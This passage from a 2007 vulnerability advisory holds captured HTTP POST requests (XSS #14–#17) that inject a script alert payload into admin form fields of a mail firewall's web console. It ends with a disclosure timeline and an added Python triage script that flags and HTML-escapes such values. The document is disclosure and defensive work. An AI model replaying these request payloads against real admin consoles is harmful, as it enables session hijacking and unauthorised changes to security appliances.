menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2C;
/admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows%5B0%5D.attrValueStr=24&rows%5B1%5D.attrName=sync_results_count&rows%5B1%5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrValidateStr=%5B1-500%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5D.langTagId=2016402&rows%5B1%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B2%5D.attrName=sync_rules_order&rows%5B2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2%5D.attrValidateStr=&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=&rows%5B2%5D.langTagId=2016403&rows%5B2%5D.attrValue=&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.attrType=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3%5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&rows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3%5D.attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.attrType=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr=%5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTagId=2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_intvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows%5B5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone=5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5D.attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValidate=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValueBean
%5BRESTART%2C+1%5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORMATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1%2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010%3A6%2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D.langTagId=2016407&rows%5B6%5D.attrValue=3&rows%5B7%5D.attrName=ldap_route_aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D.attrValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&rows%5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.langTagId=2016408&submitValue=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:22:56 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #14 ] :.

POST
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 2842
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=11;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceProperties.do%3Fmethod%3Dinit%26procId%3D164;
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2C;
/admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows%5B0%5D.attrValueStr=24&rows%5B1%5D.attrName=sync_results_count&rows%5B1%5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrValidateStr=%5B1-500%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5D.langTagId=2016402&rows%5B1%5D.attrValueStr=50&rows%5B2%5D.attrName=sync_rules_order&rows%5B2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2%5D.attrValidateStr=&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=&rows%5B2%5D.langTagId=2016403&rows%5B2%5D.attrValue=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.attrType=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3%5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&rows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3%5D.attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.attrType=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr=%5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTagId=2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_intvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows%5B5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone=5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5D.attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValidate=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValueBe
an%5BRESTART%2C+1%5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORMATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1%2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010%3A6%2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D.langTagId=2016407&rows%5B6%5D.attrValue=3&rows%5B7%5D.attrName=ldap_route_aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D.attrValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&rows%5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.langTagId=2016408&submitValue=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:23:00 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #15 ] :.

POST
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=init&procId=164
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 2842
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=11;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceProperties.do%3Fmethod%3Dinit%26procId%3D164;
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2C;
/admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows%5B0%5D.attrValueStr=24&rows%5B1%5D.attrName=sync_results_count&rows%5B1%5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrValidateStr=%5B1-500%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5D.langTagId=2016402&rows%5B1%5D.attrValueStr=50&rows%5B2%5D.attrName=sync_rules_order&rows%5B2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2%5D.attrValidateStr=&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B2%5D.langTagId=2016403&rows%5B2%5D.attrValue=&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.attrType=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3%5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&rows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3%5D.attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.attrType=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr=%5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTagId=2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_intvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows%5B5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone=5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5D.attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValidate=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValueBe
an%5BRESTART%2C+1%5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORMATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1%2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010%3A6%2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D.langTagId=2016407&rows%5B6%5D.attrValue=3&rows%5B7%5D.attrName=ldap_route_aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D.attrValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&rows%5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.langTagId=2016408&submitValue=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:23:16 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #16 ] :.

POST https://172.0.0.2:10443/admin/mailFirewall_MailRoutingInternal.do?method=save HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/mailFirewall_MailRoutingInternal.do?method=init&isMenuToggled=1
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 100
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=11;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/mailFirewall_MailRoutingInternal.do%3Fmethod%3Dinit%26isMenuToggled%3D1;
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2CMailRoutingMenu%2C;
/admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
dtype=INBOUND&input1=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&input2=&submitValue=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:23:28 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #17 ] :.

POST https://172.0.0.2:10443/admin/mailIdsConfig.do?method=save HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/mailIdsConfig.do?method=init&isMenuToggled=1&procId=90
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 2237
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=11;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/mailIdsConfig.do%3Fmethod%3Dinit%26isMenuToggled%3D1%26procId%3D90;
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2CMailRoutingMenu%2CMailIPSMenu%2CApplicationLevelMenu%2CMailIDSMenu%2CApplicationLevelMenu%2C;
/admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
procId=10&rows%5B0%5D.attrName=pass_monitor&rows%5B0%5D.attrType=5&rows%5B0%5D.attrValidate=&rows%5B0%5D.attrValidateStr=&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=0&rows%5B0%5D.langTagId=2000006&rows%5B1%5D.attrName=enable_dos&rows%5B1%5D.attrType=5&rows%5B1%5D.attrValidate=&rows%5B1%5D.attrValidateStr=&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=0&rows%5B1%5D.langTagId=2000008&rows%5B2%5D.attrName=shm_timeout&rows%5B2%5D.attrType=2&rows%5B2%5D.attrValidate=%5B1-65535%5D&rows%5B2%5D.attrValidateStr=%5B1-65535%5D&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=0&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=100&rows%5B2%5D.langTagId=2001009&rows%5B2%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B3%5D.attrName=shm_spamcount&rows%5B3%5D.attrType=2&rows%5B3%5D.attrValidate=%5B1-65535%5D&rows%5B3%5D.attrValidateStr=%5B1-65535%5D&rows%5B3%5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&rows%5B3%5D.attrValueStrClone=100&rows%5B3%5D.langTagId=2001010&rows%5B3%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA2%27%29%3C%2Fscript%3E&rows%5B4%5D.attrName=passcrackswitch&rows%5B4%5D.attrType=5&rows%5B4%5D.attrValidate=&rows%5B4%5D.attrValidateStr=&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=0&rows%5B4%5D.langTagId=2004104&rows%5B5%5D.attrName=passcrackcount&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-100%5D&rows%5B5%5D.attrValidateStr=%5B1-100%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone=5&rows%5B5%5D.langTagId=2004105&rows%5B5%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA3%27%29%3C%2Fscript%3E&rows%5B6%5D.attrName=passtimeout&rows%5B6%5D.attrType=2&rows%5B6%5D.attrValidate=%5B1-3600%5D&rows%5B6%5D.attrValidateStr=%5B1-3600%5D&rows%
5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=60&rows%5B6%5D.langTagId=2004106&rows%5B6%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA4%27%29%3C%2Fscript%3E&submitValue=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:24:22 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ TIMELINE ] :.

22/Mar/2007	- We published the advisory.
07/Mar/2007	- Second contact. The provider did not answer.
27/Feb/2007	- First contact with provider.
19/Feb/2007	- Vulnerabilities found.
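
Added example (not part of the original advisory, and not IronMail code): a defender-side triage of the kind of form body shown in XSS #17, which lists the fields whose decoded value carries HTML metacharacters or falls outside its declared range, and shows the output-encoded form. The sample body is constructed from field names in the request above; reading attrValidate values such as [1-65535] as an inclusive integer range is an assumption, and the function names are hypothetical.

```python
import html
import re
from urllib.parse import parse_qsl

# Constructed sample: shortened form body modelled on the XSS #17 request.
SAMPLE_BODY = (
    "procId=10"
    "&rows%5B2%5D.attrName=shm_timeout"
    "&rows%5B2%5D.attrValidate=%5B1-65535%5D"
    "&rows%5B2%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E"
    "&rows%5B3%5D.attrName=shm_spamcount"
    "&rows%5B3%5D.attrValidate=%5B1-65535%5D"
    "&rows%5B3%5D.attrValueStr=100"
    "&submitValue=Submit"
)

ROW_FIELD = re.compile(r"^rows\[(\d+)\]\.(\w+)$")
RANGE = re.compile(r"^\[(\d+)-(\d+)\]$")   # assumed meaning: inclusive integer range
HTML_META = re.compile(r"[<>\"'&]")        # can close an attribute or open a tag


def parse_rows(body):
    """Group rows[N].field pairs of a urlencoded body into {N: {field: value}}."""
    rows = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        m = ROW_FIELD.match(name)
        if m:
            rows.setdefault(int(m.group(1)), {})[m.group(2)] = value
    return rows


def audit(body):
    """Return one finding per row whose value is out of range or carries markup."""
    findings = []
    for idx, row in sorted(parse_rows(body).items()):
        value = row.get("attrValueStr", "")
        spec = RANGE.match(row.get("attrValidate", ""))
        in_range = True
        if spec:
            # The range is read from the request only for triage; a server-side
            # check must use its own copy, never the client-supplied one.
            lo, hi = int(spec.group(1)), int(spec.group(2))
            in_range = bool(re.fullmatch(r"[0-9]+", value)) and lo <= int(value) <= hi
        if HTML_META.search(value) or not in_range:
            findings.append({"row": idx, "name": row.get("attrName"), "raw": value,
                             "in_range": in_range,
                             "encoded": html.escape(value, quote=True)})
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_BODY):
        print(finding)
```

The encoded value is what a page should emit when echoing the field back inside an HTML attribute, so the leading '> can no longer close the attribute.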
